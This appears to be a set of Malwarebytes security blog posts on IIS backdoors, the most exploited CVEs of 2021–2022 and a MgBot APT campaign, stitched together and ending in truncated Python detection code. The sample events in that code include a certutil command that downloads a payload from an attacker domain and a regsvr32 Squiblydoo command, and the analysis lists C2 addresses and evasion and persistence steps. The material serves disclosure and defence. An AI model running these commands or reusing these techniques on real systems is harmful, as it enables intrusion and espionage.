It can help to catch attacks in the exploratory phase, the period in which attackers spend time exploring the environment after gaining initial access.\n\nStay safe, everyone!\n\nThe post [IIS extensions are on the rise as backdoors to servers](<https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T13:58:06", "type": "malwarebytes", "title": "IIS extensions are on the rise as backdoors to servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-07-27T13:58:06", "id": "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "href": "https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-29T18:23:40", "description": "A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and 
FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.\n\n## 1\\. Log4Shell\n\n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), commonly referred to as [Log4Shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nWhen Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.\n\nThis made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. 
The [CISA Log4j scanner](<https://github.com/cisagov/log4j-scanner>) is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.\n\n## 2\\. CVE-2021-40539\n\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) is a REST API authentication bypass [vulnerability in ManageEngine\u2019s single sign-on (SSO) solution](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) threat actors were likely among those exploiting the vulnerability.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it\u2019s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps, which means that any attacker able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. 
The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations.\n\n## 3\\. ProxyShell\n\nThird on the list are three vulnerabilities that are commonly grouped together and referred to as [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>): [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>), [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>), and [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>).\n\nThe danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control** with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\nThe vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. 
Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.\n\nMicrosoft\u2019s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.\n\n## 4\\. ProxyLogon\n\nAfter the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name\u2014[ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\u2014for similar reasons. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) all share the same description\u2014"This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443."\n\nWhile the CVE description is the same for the four CVEs, we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws\u2014CVE-2021-26858 and CVE-2021-27065\u2014would allow an attacker to write a file to any part of the server.\n\nTogether these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. 
Web shells can allow attackers to steal data and perform additional malicious actions.

ProxyLogon started out as a limited and targeted attack method attributed to a group called [Hafnium](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Unfortunately, it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.

Microsoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).

## 5. CVE-2021-26084

[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of [Confluence Server and Data Center](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) and that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild.
An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.

Shortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances, and crypto-miners started to use the vulnerability to run their code on unpatched servers.

On the [Confluence Support website](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.

## Lessons learned

What does this list tell us to look out for in 2022?

Well, first off, if you haven't patched one of the above we would urgently advise you to do so. And it wouldn't hurt to continue working down the [list](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) provided by CISA.

Second, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:

 * **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.
 * **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.
 * **Easy exploitability**. When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.

So, if you notice or hear about a vulnerability that meets these "requirements", move it to the top of your "to-patch" list.

Stay safe, everyone!

The post [The top 5 most routinely exploited vulnerabilities of 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).

_Published 2022-04-29._
* * *

**2022's most routinely exploited vulnerabilities: history repeats**

The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), and international partners have released a joint Cybersecurity Advisory (CSA) called the [2022 Top Routinely Exploited Vulnerabilities](<https://media.defense.gov/2023/Aug/03/2003273618/-1/-1/0/JOINT-CSA-2022-TOP-ROUTINELY-EXPLOITED-VULNERABILITIES.PDF>).

We went over the list and it felt like a bad trip down memory lane. If you adhere to the expression "those who ignore history are doomed to repeat it", then you may consider the list a valuable resource that you can derive lessons from. Unfortunately, as George Bernard Shaw said:

> "We learn from history that we learn nothing from history."

But since that's a self-contradicting expression, let's assume there are lessons to be learned.

## Last year's top vulnerabilities

First let me show you the bad memories. The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. We will use the CVE codes to uniquely identify the covered vulnerabilities.

 * [CVE-2021-40539](<https://vulners.com/cve/CVE-2021-40539>) is a REST API authentication bypass vulnerability in [ManageEngine's single sign-on (SSO) solution](<https://www.malwarebytes.com/blog/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) which results in remote code execution (RCE). When word of this vulnerability came out it was already clear that it was being exploited in the wild. Noteworthy is that this vulnerability also made it into the [top 5 routinely exploited vulnerabilities of 2021](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>).
 * [CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>), aka [Log4Shell](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>), is a vulnerability in Apache's Log4j library, an open-source logging framework incorporated into thousands of other products. Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest throughout the first half of 2022.
 * [CVE-2018-13379](<https://vulners.com/cve/CVE-2018-13379>) is a vulnerability affecting Fortinet SSL VPNs, which was also routinely exploited in 2020 and 2021.
 * [ProxyShell](<https://www.malwarebytes.com/blog/news/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities>) is a combination of three vulnerabilities in Microsoft Exchange Server ([CVE-2021-34473](<https://vulners.com/cve/CVE-2021-34473>), [CVE-2021-31207](<https://vulners.com/cve/CVE-2021-31207>), and [CVE-2021-34523](<https://vulners.com/cve/CVE-2021-34523>)) that can be chained together to allow a remote attacker to break in, take control, and then do bad things on an unpatched server. ProxyShell also made it into the top 5 routinely exploited vulnerabilities of 2021.
 * [CVE-2021-26084](<https://vulners.com/cve/CVE-2021-26084>) is a vulnerability affecting Atlassian Confluence Server and Data Center which could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a proof-of-concept (PoC) was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021, and it also made it into the top 5 routinely exploited vulnerabilities of 2021.

Looking at the above, it looks like Shaw was at least partly right. We are not learning from history. It also indicates that we should be able to predict some of the vulnerabilities that will show up in next year's list. Let's take a stab at that. So we're looking for easy-to-overlook and/or hard-to-patch vulnerabilities in the 2022 list that we haven't already covered above.

## This year's top vulnerabilities?

These are the ones that I think will make it to the top 10 next year, maybe together with the ones that have already been around for years.

 * [CVE-2022-22954](<https://vulners.com/cve/CVE-2022-22954>) and [CVE-2022-22960](<https://vulners.com/cve/CVE-2022-22960>) are two vulnerabilities that can be chained to allow remote code execution (RCE), privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. Exploitation of these [VMware vulnerabilities](<https://www.malwarebytes.com/blog/news/2022/05/vmware-vulnerabilities-are-actively-being-exploited-cisa-warns>) began in early 2022 and attempts continued throughout the remainder of the year.
 * [CVE-2022-26134](<https://vulners.com/cve/CVE-2022-26134>) is a critical RCE vulnerability that affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (see CVE-2021-26084 above), which cyber actors also exploited in 2022.
 * [CVE-2022-1388](<https://vulners.com/cve/CVE-2022-1388>) is a vulnerability in the F5 [BIG-IP platform](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>) that allows attackers to bypass authentication on internet-exposed iControl interfaces, potentially executing arbitrary commands, creating or deleting files, or disabling services.
 * [CVE-2022-30190](<https://vulners.com/cve/CVE-2022-30190>), aka [Follina](<https://www.malwarebytes.com/blog/news/2022/06/faq-mitigating-microsoft-offices-follina-zero-day>), is a Microsoft Windows Support Diagnostic Tool RCE vulnerability. An attacker can send you a malicious Office document that will compromise your machine with malware when you open it.

So I was hoping we could strike a deal. I'll check next year how well this prediction does, and you all patch these vulnerabilities real quick, so I can write about some new ones next year.

* * *

**We don't just report on vulnerabilities, we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline.
Keep vulnerabilities in tow by using [Malwarebytes Vulnerability and Patch Management](<https://www.malwarebytes.com/business/vulnerability-patch-management>).

_Published 2023-08-07 at <https://www.malwarebytes.com/blog/news/2023/08/the-2022-top-routinely-exploited-vulnerabilities-history-repeats>._

* * *

_This blog post was authored by Hossein Jazi and Jérôme Segura_

On July 2, we found an archive file with an embedded document pretending to be from the government of India.
This file used template injection to drop a malicious template which loaded a variant of Cobalt Strike.

One day later, the same threat actor changed their template and dropped a loader called MgBot, executing and injecting its final payload through the use of the Application Management (AppMgmt) service on Windows.

On July 5, we observed yet another archive file with an embedded document borrowing a statement about Hong Kong from the UK's prime minister, Boris Johnson. This document used the same TTPs to drop and execute the same payload.

Considering the ongoing tensions between India and China, as well as the new security laws over Hong Kong, we believe this new campaign is operated by a Chinese state-sponsored actor. Based on our analysis, we believe this may be a Chinese APT group that has been active since at least 2014.

### Active targeting with different lures

We were able to track the activities related to these threat actors over the course of several days, based on unique phishing attempts designed to compromise their targets.

#### 'Mail security check' with Cobalt Strike (variant 1)

This campaign was most likely carried out through spear phishing emails. The .rar file (_Mail security check.rar_) includes a document with the same name (Figure 1).

[Figure 1: Mail security check.docx](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/mailsecuritycheck-1.png>)

The document uses template injection to download a remote template from the following URL (Figure 2).
[Figure 2: Template injection](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/remoteTemplate-1.png>)

The downloaded template uses the Dynamic Data Exchange (DDE) protocol to execute malicious commands, which are encoded within the document's content (Figure 3).

[Figure 3: Encoded command](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-1.png>)

After decoding, we can see the list of commands that will be executed by DDE:

[Figure 4: Decoded commands](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-decoded-1.png>)

As Figure 4 shows, the threat actors used _certutil_ with the _-urlcache -split -f_ parameters to download a _COM scriptlet_ from their server and then used the [Squiblydoo](<https://car.mitre.org/analytics/CAR-2019-04-003/>) technique to execute the downloaded scriptlet via _regsvr32.exe_ on the victim machine.

This scriptlet is stored in the _Documents_ directory as "ff.sct". The scriptlet is an XML file that has embedded VBScript (Figure 5).

[Figure 5: ff.sct snippet](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/sct-file-1.png>)

The scriptlet creates a VB macro and calls Excel to execute it. The macro has been obfuscated to bypass static security mechanisms and is responsible for injecting the embedded payload into _rundll32.exe_ using the reflective DLL injection method. The injected payload is a variant of Cobalt Strike.

The following diagram shows the overall process of this attack:

[Figure 6: Overall process](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-12.29.43-PM.png>)

#### 'Mail security check' with MgBot (variant 2)

As we mentioned earlier, a day after the first attack, the APT group changed its remote template. In this new variant, the actors stopped using the Squiblydoo technique and Cobalt Strike as a payload.

Figure 7 shows the new encoded commands embedded within the template file.
[Figure 7: Encoded command](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-2-1.png>)

Figure 8 shows the list of commands that will be executed by DDE.

[Figure 8: Decoded commands](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/dde-decoded-2-1.png>)

In this new template file, the _storm.sct_ scriptlet was replaced with _storm.txt_. Similar to the previous version, _certutil_ is used to download the storm.txt file, which is an executable stored in the Documents directory as ff.exe.

The following diagram shows the overall execution process:

[Figure 9: Overall execution process](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-12.30.07-PM.png>)

#### "Boris Johnson Pledges to Admit 3 Million From Hong Kong" with MgBot (variant 3)

The last document used by the Chinese APT group in this campaign focused on issues happening in Hong Kong. The file was embedded within an archive file named "Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.rar".

This document quotes the prime minister after a new security law was issued by China against Hong Kong (Figure 10).

[Figure 10: Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/boris-1.png>)

Similar to the other documents, it also uses template injection to download the remote template (Figure 11).

[Figure 11: Remote template](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/remoteTemplteBoris-1.png>)

The downloaded template (BNOHK.docx) is similar to ADIN.docx (variant 2) in that it uses DDE to download and drop its loader.

### Payload analysis: MgBot (BLame, Mgmbot)

The dropped executable (ff.exe) is a new variant of a loader called MgBot that drops and loads the final payload.
This loader pretends to be a _Realtek Audio Manager tool_ (Figure 12).

[Figure 12: File version information](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-5.07.25-PM-300x115-1.png>)

It has four embedded resources, two of which are in the Chinese Simplified language. This is an indicator that suggests this campaign is likely operated by a Chinese APT group.

[Figure 13: Resource language](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/Screen-Shot-2020-07-07-at-5.07.58-PM-2.png>)

The loader starts its process by escalating privileges through a UAC bypass using the [CMSTPLUA COM interface](<https://cqureacademy.com/cqure-labs/cqlabs-how-uac-bypass-methods-really-work-by-adrian-denkiewicz>).

MgBot uses several anti-analysis and anti-virtualization techniques. The code is self-modifying, which means it alters its code sections during runtime. This makes static analysis of the sample harder.

MgBot tries to avoid running in known virtualized environments such as _VMware_, _Sandboxie_ and _VirtualBox_. To identify if it's running in one of these environments, it looks for the following DLL files: _vmhgfs.dll_, _sbiedll.dll_ and _vboxogl.dll_. If it finds any of these DLLs, it goes into an infinite loop without doing any malicious activity (Figure 14).

[Figure 14: Anti-VMs](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/virutalizationChecks-1.png>)

It also checks for the presence of security products on the victim's machine and takes a different execution flow if a security product is detected. For example, it checks for _zhudongfangyu.exe_, _360sd.exe_, _360Tray.exe_, _MfeAVSvc.exe_ and _McUICnt.exe_ in different parts of the code (Figure 15). The malware does not perform all the checks at once; rather, it checks a couple of them at different steps of its execution.
[Figure 15: Security products checks](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/av-1.png>)

To invoke the required APIs, the malware does not call them directly but instead builds a function pointer table for the required APIs. Each request to an API call is made through access to the relevant index of this table.

[Figure 16: Building function pointer table](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/apis-1.png>)

As an example, when the malware needs to invoke _WinExec_, it does so by invoking it through its index in the function pointer table.

[Figure 17: Calling API through use of function pointer table](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/winexec-1.png>)

After building the required API call table, the malware performs the following procedures:

 * It calls _CreateFileW_ to create _iot7D6E.tmp_ (a random name starting with iot) in the _%APPDATA%Temp_ directory. This tmp file is a cab file that embeds the final payload.
 * It calls _WriteFile_ to populate its content.
 * It calls _CreateProcessInternalW_ to invoke _expand.exe_ to decompress the content of _iot7D6E.tmp_ into _ProgramData\Microsoft\PlayReady\MSIBACF.tmp\tmp.dat_ (the _MSIBACF.tmp_ directory name is generated randomly and starts with MSI, followed by a combination of random numbers and characters).

[Figure 18: Calling expand.exe](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/expand-1.png>)

 * It calls _CopyFileW_ to copy tmp.dat into _pMsrvd.dll_.
 * It calls _DeleteFileW_ to delete _tmp.dat_.
 * It drops _DBEngin.EXE_ and _WUAUCTL.EXE_ in the _ProgramData\Microsoft\PlayReady_ directory. Both of these files are copies of _rundll32.exe_ that are used later to execute the dropped DLL.
 * It modifies the registry hive of the _HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt_ registry location to make itself persistent. To perform this modification, it drops two registry files named iix*.tmp (random numbers have been added to iix) into the %APPDATA%Temp directory, which are the old and new registry hives for the mentioned registry location.

To load the dropped DLL (_pMsrvd.dll_) the loader registers it as a service. To achieve this, it makes use of the already installed service, AppMgmt, to load the payload as shown in the following images:

[Figure 18: ServiceDll](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/reg2new-1.png>)

[Figure 19: ImagePath](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/regnew1-1.png>)

Finally, it executes the dropped DLL by running _net start AppMgmt_. After loading the DLL, the loader creates a cmd file (_lgt*.tmp.cmd_) in the _%APPDATA%TEMP_ directory with the content shown in Figure 20. Then it executes it to delete the cmd file and the loader from the victim's machine.

[Figure 20: cmd file](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/cmdnew-1.png>)

We were able to identify several different variants of this loader. In general, all the variants drop the final payload using _expand.exe_ or _extrac32.exe_ and then use "net start _AppMgmt_" or "net start StiSvc" to execute the dropped DLL with one of the following configurations:

 * svchost.exe -k netsvcs -p -s AppMgmt
 * svchost.exe -k netsvcs
 * svchost.exe -k imgsvc

The dropped DLL is the main payload used by this threat actor to perform malicious activities. The following shows the file version information pretending to be a _Video Team Desktop App_.

Figure 21: File info

The creation time for this DLL appears to be "2008-04-26 16:41:12". However, based on Rich header data, we can assert that this might have been tampered with by the threat actor.

Figure 22: Rich header

The DLL has eight export functions with carefully selected names to pretend they are doing normal tasks.
It can check the running services and, based on that, can inject itself into the memory space of WmiPrvSE.exe.

[Figure 23: Injection into WmiPrvse.exe](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/wmicode-1.png>)

[Figure 24: RAT's DLL is injected into memory space of WmiPrvse.exe](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/wmi-1.png>)

It uses several anti-debugging and anti-virtualization techniques to detect if it's running in a virtualized environment or if it is being debugged by a debugger. It uses the _GetTickCount_ and _QueryPerformanceCounter_ API calls to detect the debugger environment.

To detect if it is running in a virtual environment, it uses anti-VM detection instructions such as _sldt_ and _cpuid_ that can provide information about the processor, and also checks the VMware I/O port (VMXh).

[Figure 25: Environment Detection](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/type-510x600-1.png>)

All the strings used by this RAT are either obfuscated or XOR encoded to make its analysis hard.

This final piece of code bundled in MgBot is a Remote Administration Trojan with several capabilities, such as:

 * C2 communication over TCP (42.99.116[.]225:12800)
 * Ability to take screenshots
 * Keylogging
 * File and directory management
 * Process management
 * Create MUTEX

### Infrastructure relations

The following shows the infrastructure used by this APT and the relations between hosts used by this group. This APT group has used several different IP addresses to host its malicious payloads and also for its C2 communications.

What is interesting is that the majority of IP addresses used by this APT are located in Hong Kong, and almost all of these Hong Kong-based IP addresses are used for C2 communication. Even in their past campaigns they have mostly used infrastructure in Hong Kong.
The graph also shows the relationship between different IP addresses used by this APT group.

[Figure 26: Infrastructure connections](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/VT-1-1.png>)

### Android RAT

We also found several malicious Android applications we believe are part of the toolset used by this APT group. Malwarebytes detects them as _Android/Trojan.Spy.AndroRat.KSRemote_.

[Figure 27: Malicious Android APK](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/android-1.png>)

All these bogus applications contain a jar file named [ksremote.jar](<https://www.virustotal.com/gui/file/5f76192e952fd0002c1df4b66423ae803536ad82a1ae36bc9bfc6f73a7093b7f/detection>) that provides the RAT functionality:

 * Recording screen and audio using the phone's camera/mic
 * Locating the phone with coordinates
 * Stealing phone contacts, call log, SMS, web history
 * Sending SMS messages

[Figure 28: Contact grabbing capability](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/contacts-1.png>)

This RAT communicates with C&C servers using random port numbers within the 122.10.89.170 to 179 range (all in Hong Kong):

 * 122.10.89[.]172:10560
 * 122.10.89[.]170:9552
 * 122.10.89[.]172:10560

### TTPs in line with Chinese APTs

The lures used in this campaign indicate that the threat actor may be targeting the Indian government and individuals in Hong Kong, or at least those who are against the new security law issued by China.

The TTPs observed in these attacks have been used by several Chinese APT groups:

 * [Rancor](<https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/>) APT is known to use Certutil to download their payload
 * [KeyBoy](<https://www.pwc.co.uk/issues/cyber-security-services/research/the-keyboys-are-back-in-town.html>) is known to have used DDE in its previous campaigns
 * APT40 has utilized [Squiblydoo](<https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets>) and [template injection](<https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign>) in its previous campaigns.

Considering these factors, we attribute this APT attack with moderate confidence to a new Chinese APT group. Based on the TTPs used by this APT group, we were able to track its activities back to at least 2014. In all their campaigns the actor has used a variant of MgBot.

### A threat actor with a long documented history

A [Needle in a haystack](<https://www.virusbulletin.com/virusbulletin/2014/02/needle-haystack>) blog post from 2014 detailed a campaign that drops a Trojan disguised as a legitimate MP3 encoder library. In this campaign the actor used [CVE-2012-0158](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) to drop its Trojan. The rest of the TTPs, including the methods used by the threat actor to execute MgBot and the registry modifications, are similar to this ongoing campaign.

In 2018, this group performed another operation in which they used a VBScript vulnerability ([CVE-2018-8174](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174>)) to [initiate their attack](<http://771a8f83a0c6f08b2060d86fcbd40d36ee3a681beadb32ff6f288e2648c64bf9>) and drop variants of MgBot. In March 2020, an archive file ([warning.rar](<http://bc85b5b1e69728b01e64266506904eacd6bbc1bf60a5e631cb35327e494f9815>)) was submitted to VirusTotal that we believe is part of another campaign used by this actor.

We will continue to monitor this group's activities to see if their targeting or techniques evolve.
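One way to turn the MgBot loader chain analysed above (certutil download, Squiblydoo, cab expansion into the PlayReady directory, the AppMgmt ServiceDll repoint and the final `net start`) into detection logic, as an added example that is not code from the Malwarebytes post: a few rules run over constructed Sysmon-style process and registry events. The event field names, the sample events and the `Parameters\ServiceDll` value name are assumptions of this example; the rules also ignore an administrator's own `net start AppMgmt` issued from a shell.

```python
"""Detection rules for the MgBot loader chain (added example, not the post's code)."""
import re
from typing import Callable, Dict, Iterable, List, Tuple

Event = Dict[str, str]

# Constructed Sysmon-style telemetry (not real logs): one event per stage of the
# chain described in the analysis, plus one benign "net start" from an admin shell.
SAMPLE_EVENTS: List[Event] = [
    {"event": "process_create", "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "certutil -urlcache -split -f http://flash.governmentmm.com/storm.txt ff.exe"},
    {"event": "process_create", "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"regsvr32 /s /u /i:C:\Users\victim\Documents\ff.sct scrobj.dll"},
    {"event": "process_create", "image": r"C:\Windows\System32\expand.exe",
     "parent_image": r"C:\Users\victim\Documents\ff.exe",
     "command_line": r"expand C:\Users\victim\AppData\Roaming\Temp\iot7D6E.tmp "
                     r"C:\ProgramData\Microsoft\PlayReady\MSIBACF.tmp\tmp.dat"},
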